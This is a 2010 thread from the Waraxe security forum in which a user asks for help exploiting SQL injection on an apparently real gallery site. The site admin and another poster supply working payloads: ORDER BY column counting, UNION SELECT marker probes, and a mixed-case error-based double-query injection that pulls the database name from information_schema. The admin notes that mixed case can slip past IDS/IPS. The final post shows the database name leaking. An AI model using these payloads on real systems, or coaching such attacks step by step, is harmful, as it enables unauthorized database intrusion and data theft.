Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 64
Members: 0
Total: 64
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> What if the webpage doesn't disclose number of columns
Post new topicReply to topic View previous topic :: View next topic
What if the webpage doesn't disclose number of columns
PostPosted: Thu Sep 16, 2010 6:59 am Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




Hello waraxe and experts

please forgive my lack of knowledge and don't bash me : )
usually at this step I just give up, but this time I really want to get on with this issue, and learn for further experience

I have a webpage which responds to the simplest test as such
Code:
http://site.com/guests_galleries.php?kat=1'

responding with

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC LIMIT 0, 12' at line 1



But then when I try the next test
Code:
http://site.com/guests_galleries.php?kat=1+order+by+2--

it responds with

Quote:
Unknown column '2' in 'order clause'



I'm positive there are steps to take when such an error displays, I just don't have a clue what they are.
I can't search or google either because I don't know what I'm looking for Embarassed


Please guide me : )

Thanks in advance!
View user's profile Send private message
PostPosted: Fri Sep 17, 2010 8:42 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try:

Code:

http://site.com/guests_galleries.php?kat=1+order+by+1--


If you get no error, then it's one column only.
Next test:

Code:

http://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--


Try to find string "11223344" in html source code.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Sep 17, 2010 11:42 am Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




Hi waraxe and thank you for your time

well I thought it must have more than one column, because the initial error mentions
Quote:
near '' ORDER BY galleries_added DESC'


I forgot to mention that
://site.com/guests_galleries.php?kat=1+order+by+1--
results in a perfect original page..


I also discovered that by incrementing
://site.com/guests_galleries.php?kat=1+order+by+2--
to
://site.com/guests_galleries.php?kat=1+order+by+26--

that the error only appears once
Quote:
Unknown column '26' in 'order clause'


etc, while

://site.com/guests_galleries.php?kat=1+order+by+27--

and higher, results in double display of the error

Quote:
Unknown column '27' in 'order clause'Unknown column '27' in 'order clause'


so I'm thinking maybe there could be 26 columns in this table?

but trying
://site.com/guests_galleries.php?kat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

I get blank part of the page where content is normaly


same for trying ://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--

I've checked the source in all cases including the last as you suggested and there's nothing there.. (no 11223344 in our case)

instead, it shows this html code in the source

Code:
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>



I hope I've provided all neccessary info :)

Thanks again
View user's profile Send private message
PostPosted: Fri Sep 17, 2010 1:48 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You must try to get working data feedback.
Try:

Code:
http://site.com/guests_galleries.php?kat=-1+union+all+select+1122331,1122332,1122333,1122334,1122335,1122336,1122337,1122338,1122339,11223310,11223311,11223312,11223313,11223314,11223315,11223316,11223317,11223318,11223319,11223320,11223321,11223322,11223323,11223324,11223325,11223326--


and look for specific strings.
If you are unable to get normal data feedback, then exploitation may still be possible - there are blind injection methods for that, for example:

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Sep 17, 2010 3:52 pm Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




Thanks a lot waraxe
unfortunately this yielded the same <p> ;;</p> stuff, so I'll turn to reading in hope to see the light, although it might prove very difficult since my scripting language skills are zero.

And thank you for the link :)
View user's profile Send private message
Re: What if the webpage doesn't disclose number of columns
PostPosted: Sat Sep 18, 2010 2:45 am Reply with quote
Plitvix
Beginner
Beginner
Joined: Sep 18, 2010
Posts: 1




Maybe you can try some double query injections like
Code:
aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- -

It will probably work.
View user's profile Send private message
Re: What if the webpage doesn't disclose number of columns
PostPosted: Mon Sep 20, 2010 7:16 am Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




Hello Plitvix

unfortunately not but thank you
btw, why is the mixure of uppercase and lowercase letters?

Plitvix wrote:
Maybe you can try some double query injections like
Code:
aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- -

It will probably work.
View user's profile Send private message
PostPosted: Mon Sep 20, 2010 8:58 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Mixed case letters may let pass undetected by IDS/IPS sometimes.
Try this:

Code:

http://site.com/guests_galleries.php?kat=1+aND(SeLEct+1+FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct+CoNCaT(DaTABasE())+FrOM+inFoRMAtioN_ScHEmA.TabLEs+LiMiT+0,1),fLOOr(Rand(0)*2))x+FrOM+inFoRMAtioN_ScHEmA.TabLEs+GrOUP+bY+x)a)


Do you get any SQL error messages?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Sep 29, 2010 9:48 am Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




Hello again waraxe, thank you for keeping still an eye on this topic :)

yes, if fact I do
well I get an error. whether its a sql related error, I'm not sure anymore

Code:

Duplicate entry 'kylacolepre1' for key 1Duplicate entry 'kylacolepre1' for key 1
View user's profile Send private message
What if the webpage doesn't disclose number of columns
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.060 Seconds